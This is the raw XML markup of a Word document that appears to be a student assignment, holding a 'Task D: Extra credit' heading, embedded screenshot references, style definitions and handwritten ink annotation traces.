                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>509890</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3224160" cy="474120"/>
                <wp:effectExtent l="38100" t="38100" r="40005" b="4699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3224160" cy="47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26B3E" id="Ink 34" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:129.05pt;margin-top:39.45pt;width:255.25pt;height:38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">
                <v:imagedata r:id="rId34" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E4D75F0" wp14:editId="4D571115">
            <wp:extent cx="6120788" cy="3752906"/>
            <wp:effectExtent l="0" t="0" r="635" b="6350"/>
            <wp:docPr id="3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screenshot of a comput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055" cy="375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90693" w14:textId="267DDBD8" w:rsidR="00A6016C" w:rsidRDefault="00A6016C" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4567A7EA" w14:textId="34A1A090" w:rsidR="00A6016C" w:rsidRDefault="00A6016C" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37998503" w14:textId="17908F9F" w:rsidR="00A6016C" w:rsidRDefault="00A6016C" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FE27DD6" w14:textId="4F0241A0" w:rsidR="00A6016C" w:rsidRDefault="00A6016C" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="249C6A86" w14:textId="1FAF5087" w:rsidR="00A6016C" w:rsidRDefault="00A6016C" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23B10736" w14:textId="596E76FC" w:rsidR="00A6016C" w:rsidRDefault="00A6016C" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DD78F9D" w14:textId="51AD73B8" w:rsidR="00A6016C" w:rsidRDefault="00A6016C" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="063D3316" w14:textId="74DD9347" w:rsidR="00A6016C" w:rsidRDefault="00A6016C" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73680526" w14:textId="789A7478" w:rsidR="00A6016C" w:rsidRDefault="00A6016C" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58730E90" w14:textId="5102849A" w:rsidR="00A6016C" w:rsidRDefault="00A6016C" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68A5DD10" w14:textId="3E1E95D7" w:rsidR="00A6016C" w:rsidRDefault="00A6016C" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36672994" w14:textId="2EB2EFC1" w:rsidR="00A6016C" w:rsidRDefault="00A6016C" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21A4828D" w14:textId="3F3120FB" w:rsidR="00A6016C" w:rsidRDefault="00A6016C" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ACB1B24" w14:textId="3CDD2BBD" w:rsidR="00A6016C" w:rsidRDefault="00A6016C" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BE3CE93" w14:textId="3D7899DF" w:rsidR="00A6016C" w:rsidRDefault="00A6016C" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56B3C9E4" w14:textId="4A550D6A" w:rsidR="00A6016C" w:rsidRDefault="00A6016C" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BF07054" w14:textId="121211AC" w:rsidR="00A6016C" w:rsidRDefault="00A6016C" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A3CAE14" w14:textId="64EF10C0" w:rsidR="00A6016C" w:rsidRDefault="00A6016C" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42628DA3" w14:textId="59E071AB" w:rsidR="00A6016C" w:rsidRDefault="00A6016C" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12758397" w14:textId="414602DC" w:rsidR="00A6016C" w:rsidRDefault="00A6016C" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35E884F2" w14:textId="3440F548" w:rsidR="00A6016C" w:rsidRDefault="00A6016C" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B0E9BEE" w14:textId="3A80CBF5" w:rsidR="00A6016C" w:rsidRDefault="00A6016C" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2105D04F" w14:textId="17F53938" w:rsidR="00A6016C" w:rsidRDefault="00A6016C" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Task D: Extra credit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A0E818" w14:textId="78F4B6E2" w:rsidR="00FC37F4" w:rsidRDefault="00FC37F4" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F18F7F5" w14:textId="0C3B8FB7" w:rsidR="00FC37F4" w:rsidRDefault="00FC37F4" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66206D9B" w14:textId="0519D384" w:rsidR="00A6016C" w:rsidRDefault="00A6016C" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AD41A43" w14:textId="7253C197" w:rsidR="00A6016C" w:rsidRDefault="00FC37F4" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23CBF3EE" wp14:editId="6E634B7C">
            <wp:extent cx="5943600" cy="3644265"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="35" name="Picture 3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AD47" w14:textId="56A2342A" w:rsidR="00FC37F4" w:rsidRDefault="00FC37F4" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="673A962D" w14:textId="4F68C6EA" w:rsidR="00667093" w:rsidRDefault="00667093" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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7ED2FCB6" wp14:editId="5275A841">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>153085</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5515673</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="3644265"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:wrapNone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530B0" w14:textId="434CFB4A" w:rsidR="00667093" w:rsidRDefault="00667093" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24304E74" w14:textId="402465F9" w:rsidR="00667093" w:rsidRDefault="00667093" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37423E0E" w14:textId="40EF4DAD" w:rsidR="00667093" w:rsidRDefault="00667093" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3344B9ED" w14:textId="65F95DB3" w:rsidR="00667093" w:rsidRDefault="00667093" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E99642C" w14:textId="595E451B" w:rsidR="00667093" w:rsidRDefault="00667093" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="456E3F83" w14:textId="1E3113CF" w:rsidR="00667093" w:rsidRDefault="00667093" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34075390" w14:textId="536DE62C" w:rsidR="00667093" w:rsidRDefault="00667093" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E2FB609" w14:textId="3A8C5551" w:rsidR="00667093" w:rsidRDefault="00667093" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60DBF9A3" w14:textId="58150CAF" w:rsidR="00667093" w:rsidRDefault="00667093" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C5E635C" w14:textId="3FEA374E" w:rsidR="00667093" w:rsidRDefault="00667093" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5970D64A" w14:textId="35CFA99F" w:rsidR="00667093" w:rsidRDefault="00667093" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="314789EF" w14:textId="285B7A78" w:rsidR="00667093" w:rsidRDefault="00667093" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A8B3F04" w14:textId="7E9D60B8" w:rsidR="00667093" w:rsidRDefault="00667093" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69FA46D2" w14:textId="77777777" w:rsidR="00667093" w:rsidRDefault="00667093" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47ED50F7" w14:textId="77777777" w:rsidR="00667093" w:rsidRDefault="00667093" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FBF93BB" w14:textId="09D35003" w:rsidR="00667093" w:rsidRDefault="00667093" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="320982E2" w14:textId="7CB30A89" w:rsidR="00667093" w:rsidRDefault="00667093" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32E1E8F8" w14:textId="2A88CCDE" w:rsidR="00667093" w:rsidRDefault="00667093" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D6D5F7D" w14:textId="11470542" w:rsidR="00FC37F4" w:rsidRDefault="00FC37F4" w:rsidP="00667093">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="207CDA4D" w14:textId="01C3FA2D" w:rsidR="00667093" w:rsidRPr="00A6016C" w:rsidRDefault="00667093" w:rsidP="00667093">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00667093" w:rsidRPr="00A601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9B58FC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5D54B832"/>
    <w:lvl w:ilvl="0" w:tplc="CB7032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49D5186"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3228B9C4"/>
    <w:lvl w:ilvl="0" w:tplc="6426840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F750561"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4EFEC0E0"/>
    <w:lvl w:ilvl="0" w:tplc="0E809F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2826466">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1709527426">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="129827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F69"/>
    <w:rsid w:val="0000245F"/>
    <w:rsid w:val="00021C77"/>
    <w:rsid w:val="000D27D6"/>
    <w:rsid w:val="001030E2"/>
    <w:rsid w:val="0017042E"/>
    <w:rsid w:val="001E17F6"/>
    <w:rsid w:val="00211F54"/>
    <w:rsid w:val="00241BD4"/>
    <w:rsid w:val="002A61C4"/>
    <w:rsid w:val="0030605F"/>
    <w:rsid w:val="00362345"/>
    <w:rsid w:val="00383A03"/>
    <w:rsid w:val="003C5F14"/>
    <w:rsid w:val="00471FF6"/>
    <w:rsid w:val="004C33AB"/>
    <w:rsid w:val="005C220E"/>
    <w:rsid w:val="005C4E2E"/>
    <w:rsid w:val="00667093"/>
    <w:rsid w:val="006C686F"/>
    <w:rsid w:val="006F248A"/>
    <w:rsid w:val="00722088"/>
    <w:rsid w:val="007C53B5"/>
    <w:rsid w:val="00823FAF"/>
    <w:rsid w:val="008B15FC"/>
    <w:rsid w:val="00924C35"/>
    <w:rsid w:val="00945F69"/>
    <w:rsid w:val="00985195"/>
    <w:rsid w:val="009F7DBD"/>
    <w:rsid w:val="00A6016C"/>
    <w:rsid w:val="00A623F3"/>
    <w:rsid w:val="00A976BB"/>
    <w:rsid w:val="00AA3938"/>
    <w:rsid w:val="00CD7010"/>
    <w:rsid w:val="00E46A0C"/>
    <w:rsid w:val="00ED7C47"/>
    <w:rsid w:val="00F43D09"/>
    <w:rsid w:val="00FA7F33"/>
    <w:rsid w:val="00FC37F4"/>
    <w:rsid w:val="00FC4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2560D4"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{5FA965D1-763B-0146-9317-2EA2FD318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5F69"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="008B15FC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B15FC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B15FC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B15FC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B15FC"/>
    <w:pPr>
      <w:spacing w:before="200" w:after="0"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:smallCaps/>
      <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
      <w:spacing w:val="10"/>
      <w:sz w:val="22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B15FC"/>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:smallCaps/>
      <w:color w:val="ED7D31" w:themeColor="accent2"/>
      <w:spacing w:val="5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B15FC"/>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:smallCaps/>
      <w:color w:val="ED7D31" w:themeColor="accent2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B15FC"/>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="7"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:i/>
      <w:smallCaps/>
      <w:color w:val="C45911" w:themeColor="accent2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B15FC"/>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="8"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:i/>
      <w:smallCaps/>
      <w:color w:val="823B0B" w:themeColor="accent2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15FC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B15FC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B15FC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B15FC"/>
    <w:rPr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B15FC"/>
    <w:rPr>
      <w:smallCaps/>
      <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
      <w:spacing w:val="10"/>
      <w:sz w:val="22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B15FC"/>
    <w:rPr>
      <w:smallCaps/>
      <w:color w:val="ED7D31" w:themeColor="accent2"/>
      <w:spacing w:val="5"/>
      <w:sz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B15FC"/>
    <w:rPr>
      <w:b/>
      <w:smallCaps/>
      <w:color w:val="ED7D31" w:themeColor="accent2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B15FC"/>
    <w:rPr>
      <w:b/>
      <w:i/>
      <w:smallCaps/>
      <w:color w:val="C45911" w:themeColor="accent2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B15FC"/>
    <w:rPr>
      <w:b/>
      <w:i/>
      <w:smallCaps/>
      <w:color w:val="823B0B" w:themeColor="accent2" w:themeShade="7F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B15FC"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:sz w:val="16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B15FC"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="12" w:space="1" w:color="ED7D31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8B15FC"/>
    <w:rPr>
      <w:smallCaps/>
      <w:sz w:val="48"/>
      <w:szCs w:val="48"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Subtitle">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="SubtitleChar"/>
    <w:uiPriority w:val="11"/>
    <w:qFormat/>
    <w:rsid w:val="008B15FC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8B15FC"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="008B15FC"/>
    <w:rPr>
      <w:b/>
      <w:color w:val="ED7D31" w:themeColor="accent2"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="008B15FC"/>
    <w:rPr>
      <w:b/>
      <w:i/>
      <w:spacing w:val="10"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="NoSpacingChar"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="008B15FC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B15FC"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="008B15FC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B15FC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B15FC"/>
    <w:rPr>
      <w:i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B15FC"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="8" w:space="10" w:color="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        <w:left w:val="single" w:sz="8" w:space="10" w:color="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        <w:bottom w:val="single" w:sz="8" w:space="10" w:color="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        <w:right w:val="single" w:sz="8" w:space="10" w:color="C45911" w:themeColor="accent2" w:themeShade="BF"/>
      </w:pBdr>
      <w:shd w:val="clear" w:color="auto" w:fill="ED7D31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B15FC"/>
    <w:rPr>
      <w:b/>
      <w:i/>
      <w:color w:val="FFFFFF" w:themeColor="background1"/>
      <w:shd w:val="clear" w:color="auto" w:fill="ED7D31" w:themeFill="accent2"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="SubtleEmphasis">
    <w:name w:val="Subtle Emphasis"/>
    <w:uiPriority w:val="19"/>
    <w:qFormat/>
    <w:rsid w:val="008B15FC"/>
    <w:rPr>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="008B15FC"/>
    <w:rPr>
      <w:b/>
      <w:i/>
      <w:color w:val="ED7D31" w:themeColor="accent2"/>
      <w:spacing w:val="10"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="SubtleReference">
    <w:name w:val="Subtle Reference"/>
    <w:uiPriority w:val="31"/>
    <w:qFormat/>
    <w:rsid w:val="008B15FC"/>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="008B15FC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8B15FC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B15FC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2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customXml" Target="ink/ink2.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink4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customXml" Target="ink/ink3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customXml" Target="ink/ink1.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28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23T18:28:32.820"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">359 517 24575,'0'-14'0,"0"-2"0,0 5 0,0-5 0,0 3 0,-4-1 0,2-2 0,-5-2 0,6 1 0,-1-4 0,2 5 0,0-1 0,0 0 0,0 0 0,0 0 0,0-3 0,0 6 0,0-6 0,0 9 0,0 0 0,-5 4 0,4 2 0,-3 1 0,4-1 0,0 1 0,-2 1 0,1 0 0,-1 0 0,2-4 0,-2 2 0,2-5 0,-2 5 0,2-2 0,0 2 0,-2 0 0,1 1 0,-1-1 0,0 3 0,2-2 0,-1 3 0,4-1 0,1 2 0,6 0 0,-1 0 0,7 0 0,1 3 0,4 3 0,0 3 0,3 3 0,-7-1 0,3 1 0,-6-1 0,-1-3 0,-5-1 0,-1-2 0,0 0 0,4 0 0,3 0 0,2 3 0,4-1 0,1 4 0,4-5 0,-1 6 0,0-5 0,-6 1 0,2-2 0,-12-1 0,5 0 0,-8 0 0,2-1 0,-4 1 0,-1-1 0,0-1 0,-2 1 0,4-4 0,-1 4 0,1-4 0,3 5 0,-1-3 0,6 4 0,-6-4 0,6 3 0,-6-4 0,1 3 0,-3-4 0,1 5 0,0-5 0,-3 4 0,2-3 0,-3 2 0,1 0 0,-4-1 0,-6 2 0,-7-3 0,-6 2 0,-3-3 0,-5 3 0,0-3 0,0 6 0,-3-5 0,3 4 0,-4-4 0,4 2 0,-3 0 0,10-3 0,-6 3 0,11-3 0,-7 0 0,6 3 0,-5-3 0,5 3 0,-6-3 0,0 0 0,-9 0 0,6 0 0,-8 0 0,13 0 0,-7 0 0,8-3 0,-2 0 0,8-2 0,-2-3 0,7 4 0,2-2 0,1 3 0,3 0 0,-1 1 0,1 2 0,-1 0 0,1 0 0,0 0 0,-1 0 0,-2 0 0,2 0 0,-5 0 0,2 0 0,1 0 0,-1 0 0,4 0 0,-1 0 0,0 0 0,3-1 0,2 0 0,2-1 0,3 2 0,-1-2 0,1 2 0,2-5 0,1 2 0,2 1 0,0-3 0,0 2 0,3-5 0,1 2 0,3-4 0,-1 1 0,1-2 0,3 2 0,-2-2 0,-1 2 0,-1 1 0,-5 0 0,2 3 0,-5 0 0,-1 0 0,-3 3 0,1 0 0,-2-1 0,1 3 0,-2-2 0,3 0 0,-1-1 0,3-4 0,4-1 0,3-6 0,4-1 0,0-1 0,-1 2 0,-3 3 0,-1 3 0,-5-2 0,-1 7 0,-2-4 0,-1 7 0,1-2 0,-1 2 0,1-2 0,2-1 0,3-5 0,4 2 0,0-4 0,2 4 0,-2-4 0,2 3 0,-2-3 0,-1 4 0,-2-1 0,-4 4 0,0 1 0,-2 2 0,0-2 0,-1 1 0,0-1 0,3 2 0,-2 0 0,5-2 0,-2 1 0,2-3 0,0 3 0,-2-1 0,-1 2 0,-2 0 0,-1 0 0,-1 1 0,-1 2 0,-2 1 0,0 4 0,0-1 0,0 1 0,0 2 0,0-5 0,-2 2 0,1 0 0,-3-2 0,1 5 0,-2-2 0,2 5 0,-4-2 0,4 5 0,-5-5 0,3 2 0,0 0 0,-1 1 0,-2-1 0,3 1 0,-3-7 0,5 0 0,-1 0 0,4-1 0,-5 1 0,5-3 0,-4-1 0,3 1 0,-3-2 0,3 3 0,-3-1 0,2 4 0,-1-3 0,-2 4 0,5-1 0,-5 5 0,2-2 0,-2 2 0,2-3 0,-2 1 0,5-4 0,-5 0 0,5-2 0,-2 0 0,0-1 0,1 1 0,-1 0 0,2-1 0,-2-1 0,1 1 0,-5-2 0,2 8 0,-3-1 0,1 4 0,-1 2 0,1-4 0,-1 1 0,2-2 0,0 1 0,-1 0 0,1 2 0,0-3 0,0 0 0,0-2 0,0 1 0,0-4 0,0 3 0,2-4 0,-1-1 0,2-1 0,-3-2 0,1 2 0,-4 1 0,1 1 0,-1 1 0,-2 0 0,5-2 0,-2-1 0,2-2 0,1 0 0,1-2 0,1 0 0,2-2 0,0-1 0,0 1 0,2 1 0,-2-1 0,4 4 0,-1-2 0,-1 2 0,0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23T18:28:26.602"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
